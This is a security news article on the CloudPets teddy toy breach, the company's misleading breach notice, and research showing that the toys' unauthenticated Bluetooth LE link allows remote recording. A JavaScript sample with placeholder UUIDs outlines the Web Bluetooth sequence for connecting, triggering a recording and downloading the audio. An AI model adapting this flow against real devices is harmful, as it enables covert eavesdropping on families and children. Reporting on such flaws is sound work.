The CloudPets data breach saga continues, as Spiral Toys finally reported the breach to the California Attorney General’s Office.
As a reminder: Leaked data provided to security researcher Troy Hunt showed that MongoDB databases containing personal information, hashed passwords and voice recordings of messages by children and parents using CloudPets teddy toys were sitting unprotected on the Internet since December 2016.
The databases were repeatedly accessed by unauthorized users, some of whom apparently copied the contents to their own servers, deleted the databases, and demanded a ransom to return the data.
Downplaying the seriousness of the data breach
The breach notice sent to the California Attorney General’s Office includes the false claim that the company first learned of a potential breach on February 22, even though, well before that date, researchers and reporters had repeatedly sent messages to as many company email addresses and social media accounts as they could find, warning it of the breach.
Hunt has gone through the notice and pointed out (at the very end of his write-up) the many inaccuracies and pieces of misinformation it contains, so I won’t repeat them here. Suffice it to say that the company is still trying to make it look like it did everything it could to prevent a breach, and that the breach is not as extensive as the evidence shows it to be.
CloudPets security is a nightmare
When all this is taken into consideration, it shouldn’t come as a surprise that the CloudPets toys were found to lack security protections that would prevent them from becoming remote surveillance devices.
Context Information Security researchers have been testing CloudPets toys for a few months now, and have discovered that the toy uses the Bluetooth LE (Low Energy) wireless personal area network technology to communicate with a smartphone app.
They also found that it’s easy to set up a webpage that could send instructions to a nearby toy to remotely trigger its recording functionality, download the recorded audio and play it back on a phone, record audio from the phone, and upload it to the toy, etc.
They even provided the code for it on GitHub, so others can test the attack (on a CloudPets toy that they own). The code uses Chrome’s new Web Bluetooth API to communicate with the toy, and works only in Chrome on Windows and on Chrome OS.
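As an added illustration, which is not the Context IS code from their GitHub repository, the JavaScript below shows the Web Bluetooth call sequence such a page goes through: requestDevice() needs a single click on the attacker’s page, after which gatt.connect() and the GATT reads and writes proceed with no pairing or PIN step, which is exactly why anyone in range can drive the toy. Every UUID and the command byte are assumed placeholders (the real CloudPets values are not on this page), and the fake `navigator.bluetooth` object at the end exists only so the flow can be run outside a browser.

```javascript
// Added example: the Web Bluetooth call sequence a web page uses to talk to a
// BLE peripheral. All UUIDs and the command byte are ASSUMED placeholders for
// illustration; the real CloudPets values are not part of this article.
const TOY_SERVICE_UUID = '0000aaaa-0000-1000-8000-00805f9b34fb';  // assumed
const COMMAND_CHAR_UUID = '0000aaa1-0000-1000-8000-00805f9b34fb'; // assumed
const AUDIO_CHAR_UUID = '0000aaa2-0000-1000-8000-00805f9b34fb';   // assumed
const CMD_START_RECORDING = 0x01;                                  // assumed opcode

// `bluetooth` is navigator.bluetooth in Chrome. It is passed in rather than read
// from the global so the same flow can be exercised with a fake object below.
async function connectToToy(bluetooth, namePrefix) {
  // requestDevice() opens the browser's device chooser and requires a user
  // gesture (a click). That click is the only gate: the toy asks for no pairing
  // or PIN, so once it is chosen the GATT calls below just proceed.
  const device = await bluetooth.requestDevice({
    filters: [{ namePrefix }],
    optionalServices: [TOY_SERVICE_UUID],
  });
  const server = await device.gatt.connect();
  const service = await server.getPrimaryService(TOY_SERVICE_UUID);
  const command = await service.getCharacteristic(COMMAND_CHAR_UUID);
  const audio = await service.getCharacteristic(AUDIO_CHAR_UUID);
  return { device, command, audio };
}

// Write the (assumed) "start recording" opcode to the command characteristic.
async function triggerRecording(toy) {
  await toy.command.writeValue(Uint8Array.of(CMD_START_RECORDING));
}

// Read the recorded audio back one GATT read at a time until an empty value
// comes back (an assumed end-of-data convention), then concatenate the chunks.
async function downloadAudio(toy) {
  const chunks = [];
  for (;;) {
    const view = await toy.audio.readValue(); // Web Bluetooth returns a DataView
    if (view.byteLength === 0) break;
    chunks.push(new Uint8Array(view.buffer, view.byteOffset, view.byteLength));
  }
  const out = new Uint8Array(chunks.reduce((n, c) => n + c.length, 0));
  let offset = 0;
  for (const c of chunks) { out.set(c, offset); offset += c.length; }
  return out;
}

// Whole flow: connect, trigger a recording, pull the audio back.
async function recordAndDownload(bluetooth, namePrefix) {
  const toy = await connectToToy(bluetooth, namePrefix);
  await triggerRecording(toy);
  return downloadAudio(toy);
}

// Constructed stand-in for navigator.bluetooth: serves the given audio chunks
// and records every command write, so the flow can run without a real toy.
function makeFakeBluetooth(chunks) {
  const writes = [];
  let next = 0;
  const command = { writeValue: async (v) => { writes.push(Array.from(v)); } };
  const audio = {
    readValue: async () => {
      const bytes = next < chunks.length ? chunks[next++] : new Uint8Array(0);
      return new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
    },
  };
  const service = {
    getCharacteristic: async (uuid) => (uuid === COMMAND_CHAR_UUID ? command : audio),
  };
  const server = { getPrimaryService: async () => service };
  const device = { name: 'Toy-fake', gatt: { connect: async () => server } };
  return { requestDevice: async () => device, writes };
}

// Stand-alone demo against the fake when no real Web Bluetooth is available.
if (!globalThis.navigator || !globalThis.navigator.bluetooth) {
  const fake = makeFakeBluetooth([Uint8Array.of(1, 2), Uint8Array.of(3, 4, 5)]);
  recordAndDownload(fake, 'Toy').then((audio) =>
    console.log('audio bytes:', Array.from(audio), 'writes:', fake.writes));
}
```

In a real page the same entry point would be called as `recordAndDownload(navigator.bluetooth, prefix)` from a click handler, because requestDevice() rejects without a user gesture; nothing else on the toy side stands between that click and the microphone.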
“Anyone can connect to the toy, as long as it is switched on and not currently connected to anything else. Bluetooth LE typically has a range of about 10 – 30 meters, so someone standing outside your house could easily connect to the toy, upload audio recordings, and receive audio from the microphone,” the researchers noted. The attack is demonstrated in this video:
Context IS researchers repeatedly tried to contact Spiral Toys and responsibly share their findings, so that the issues could be fixed before they were publicly disclosed. Like others before them, they received no acknowledgement from the company.
At this point, consumers who bought a CloudPets toy would do well to throw it out, or at least take out the batteries. They should also delete their CloudPets account and, finally, uninstall the associated mobile app.